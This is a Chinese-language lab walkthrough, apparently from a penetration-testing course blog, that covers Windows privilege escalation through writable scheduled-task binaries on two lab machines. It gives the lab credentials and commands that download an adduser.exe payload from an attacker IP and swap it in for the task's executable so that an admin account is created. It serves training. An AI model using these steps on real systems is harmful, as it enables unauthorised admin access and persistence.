Windows Scheduled Tasks 提權

Windows Scheduled Tasks 提權 


從排程任務中取得三個資訊對於識別可能的權限升級向量至關重要:

 - 該任務以哪個使用者帳戶(主體)執行?

 - 為任務指定了哪些觸發器?

 - 當滿足其中一個或多個觸發器時會執行哪些操作?


靶機 IP 192.168.195.220,已知帳號密碼 steve / securityIsNotAnOption++++++

透過取代指定為操作的二進位檔案來利用排程任務 CacheCleanup 。取得程式碼執行、互動式 shell 或以管理使用者身分存取 GUI,並在 daveadmin 桌面上找到 Flag。


第一步 RDP 進去 └─$ xfreerdp -v:192.168.195.220 -u:steve -p:securityIsNotAnOption++++++

可以使用 Get-ScheduledTask 查看當前的任務



或是使用 schtasks /query /fo LIST /v 來查看也可以

一般滲透時要專注在作者(Author)、任務名稱、路徑(Task to Run)、下次執行時間(Next Run Time)這幾個比較有用的欄位

本練習有直接告知專注 CacheCleanup 任務如下

路徑 C:\Users\steve\Pictures\BackendCacheCleanup.exe

Run As User : daveadmin

看起來約每分鐘會執行一次該 Task



在 GUI 的介面中也可以看到該 Task 如下圖



該任務是由 daveadmin 帳號執行,但是執行的檔案位於 steve 帳號的 Profile 底下,所以 steve 應該有權限可以修改該檔案,最簡單的方式就是 icacls 查看一下

指令 : icacls C:\Users\steve\Pictures\BackendCacheCleanup.exe

結果顯示 (F) : FullControl,那就是直接替換檔案最快了




前幾節用到的 adduser.exe 直接拿來利用,一樣透過 iwr 從我們的攻擊機下載,存檔時直接使用預計替換的檔名 BackendCacheCleanup.exe

iwr -Uri http://192.168.45.161/adduser.exe -Outfile BackendCacheCleanup.exe




先 net user 看一下確認有無 dave2,目前是沒有



替換檔案前記得先將原始檔案備份一下,滲透後換回去是基本的

move .\Pictures\BackendCacheCleanup.exe BackendCacheCleanup.exe.bak

備份好後就直接替換掉吧

move .\BackendCacheCleanup.exe .\Pictures\

等待一段時間後 net user 看到 dave2 了,順便看一下 administrators 群組




結束後記得先移除我們替換的檔案,再將原始檔案移動回去

Remove-Item .\Pictures\BackendCacheCleanup.exe

move .\BackendCacheCleanup.exe.bak .\Pictures\BackendCacheCleanup.exe



接著就 Run As dave2 拿 Flag 吧









練習 2

靶機 IP 192.168.195.221,已知帳號密碼 moss / work6potence6PLASMA6flint7

列舉系統上的排程任務,並找到一種方法來取得互動式 shell 作為執行排程任務的使用者。該標誌可以在其桌面上找到。


RDP 進去開 Task Schedule 看來就是 Voice Activation

路徑 C:\Users\moss\Searches\VoiceActivation.exe




一樣 icacls 一下,(F) FullControl



按表操課 

iwr -Uri http://192.168.45.161/adduser.exe -Outfile VoiceActivation.exe

net user

move .\Searches\VoiceActivation.exe VoiceActivation.exe.bak

move .\VoiceActivation.exe .\Searches\




net user & net localgroup administrators,dave2 出現了



記得移掉檔案並將原始檔案移回去

Remove-Item .\Searches\VoiceActivation.exe

move .\VoiceActivation.exe.bak .\Searches\VoiceActivation.exe

Run As dave2 拿 flag 吧




留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

濫用 Windows 庫文件(Library File)

Challenge 0 - Secura(1)